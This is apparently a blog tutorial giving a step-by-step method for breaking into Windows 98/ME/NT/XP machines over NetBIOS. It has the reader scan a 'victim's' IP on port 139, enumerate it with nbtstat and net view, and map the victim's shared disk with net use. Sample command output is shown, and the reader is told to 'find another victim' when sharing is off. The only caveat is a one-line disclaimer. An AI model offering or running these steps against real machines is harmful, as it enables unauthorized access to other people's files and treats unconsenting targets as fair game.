NetBios Hacking For Windows 98/ME/NT/XP Tutorial

Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.

Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.

Step 1
Get a IP (range) scanner. (superscanner is a fast one, get it here).
Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:\windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS  Remote Machine Name  TableName    Type    Status
—————————————————————
user<00>                                  UNIQUE                                 Registered
workgroup <00>                       GROUP                                  Registered
user <03>                                 UNIQUE                                 Registered
user  <20>                                UNIQUE                                  Registered

MAC Address = xx-xx-xx-xx-xx-xx
—————————————————————

If you don’t get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:\windows>net view \\255.255.255.255

if the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

————————————————————
CDISK Disk xxxxx xxxxx

The command completed successfully.

“DISK” shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.

c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:\> .

Hope you have enjoyed this small  hacking tutorial.

Amol Wagh

Amol Wagh

Author is a Tech blogger & loves to share his work on web by writing guidelines for Ethical Hacking students & Security professionals. Performing various types of hacking from pen test to smartphone hacking – He enjoys hacking just for personal research purpose. Working with more of 'grey as well as black hat' hackers for learning advanced hacking as well as defending techniques & share them with learners. His prime area of research is Cyber Criminals & currently working on a Video Product Development to teach hacking & Pen Testing for absolute beginners.